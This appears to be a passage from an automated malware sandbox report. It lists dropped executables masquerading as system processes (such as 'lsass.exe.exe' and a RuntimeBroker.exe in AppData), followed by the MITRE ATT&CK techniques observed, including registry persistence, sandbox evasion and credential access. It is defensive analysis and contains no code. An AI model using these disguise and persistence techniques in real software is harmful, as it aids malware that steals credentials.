  "C:\DriversavessessionDlldhcp\lsass.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:10092
- C:\Users\Admin\AppData\Local\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  PID:3336

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3934855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:10464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery